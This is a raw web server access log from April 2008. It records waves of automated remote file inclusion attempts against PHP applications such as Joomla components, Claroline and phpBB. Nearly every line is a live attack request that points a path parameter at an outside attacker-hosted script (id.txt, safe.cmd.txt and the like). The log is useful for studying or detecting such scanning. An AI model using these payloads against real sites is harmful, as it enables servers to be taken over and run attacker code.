202.29.32.2 - - [07/Apr/2008:09:27:03 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:27:04 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:27:04 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:27:15 -0700] "HEAD /logs/access_071216.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
79.30.170.102 - - [07/Apr/2008:09:27:22 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:09:27:22 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:09:27:23 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:32 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:33 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:33 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.179.229.229 - - [07/Apr/2008:09:27:38 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.179.229.229 - - [07/Apr/2008:09:27:39 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:09:27:44 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:09:27:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:09:27:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:46 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:46 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:27:47 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:27:59 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:28:03 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.187 - - [07/Apr/2008:09:28:17 -0700] "GET /logs/access_071005.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.208.24.99 - - [07/Apr/2008:09:28:27 -0700] "GET /logs/access_071229.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.208.24.99 - - [07/Apr/2008:09:28:28 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
87.208.24.99 - - [07/Apr/2008:09:28:29 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.16.55 - - [07/Apr/2008:09:28:33 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [07/Apr/2008:09:28:33 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [07/Apr/2008:09:28:33 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:28:35 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:28:35 -0700] "GET /logs/access_080215.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:28:35 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:28:36 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.208.24.99 - - [07/Apr/2008:09:28:49 -0700] "GET /logs/access_080211.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:09:28:49 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:28:50 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:28:51 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:28:51 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:29:09 -0700] "HEAD /logs/access_080117.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:29:26 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:29:26 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:29:26 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:29:28 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:29:28 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:29:28 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:29:37 -0700] "GET /logs/access_080309.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:29:39 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:29:39 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:30:17 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:30:18 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:30:19 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:30:20 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:30:20 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:30:21 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:34 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:38 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:30:39 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:09:30:45 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:09:30:45 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:09:30:45 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:31:27 -0700] "GET /logs/access_071229.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:31:27 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:31:28 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.157.176.245 - - [07/Apr/2008:09:31:54 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:31:57 -0700] "GET /logs/access_080119.log/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.208.24.99 - - [07/Apr/2008:09:32:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
202.157.176.245 - - [07/Apr/2008:09:32:12 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
89.108.66.169 - - [07/Apr/2008:09:32:13 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.168.243 - - [07/Apr/2008:09:32:30 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.168.243 - - [07/Apr/2008:09:32:37 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:09:32:43 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:09:32:44 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:09:32:45 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:32:45 -0700] "GET /logs/access_080220.log/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:32:45 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:32:48 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:09:32:49 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:32:51 -0700] "GET /logs/access_080219.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:32:53 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:32:53 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:32:55 -0700] "GET /logs/access_080218.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:33:02 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:33:03 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:33:05 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:33:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.145.0.44 - - [07/Apr/2008:09:33:06 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:33:26 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:33:26 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:33:26 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:09:33:32 -0700] "GET /logs/access_080201.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:33:36 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:33:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:09:33:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:33:46 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:33:46 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:33:48 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:33:49 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.225.189.206 - - [07/Apr/2008:09:33:59 -0700] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.225.189.206 - - [07/Apr/2008:09:34:00 -0700] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:09:34:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:34:04 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:34:05 -0700] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:34:06 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:34:06 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:34:07 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.53.197.2 - - [07/Apr/2008:09:34:08 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:09:34:19 -0700] "GET /logs/access_080329.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:34:19 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:34:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:34:22 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:34:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [07/Apr/2008:09:34:25 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [07/Apr/2008:09:34:26 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:34:30 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
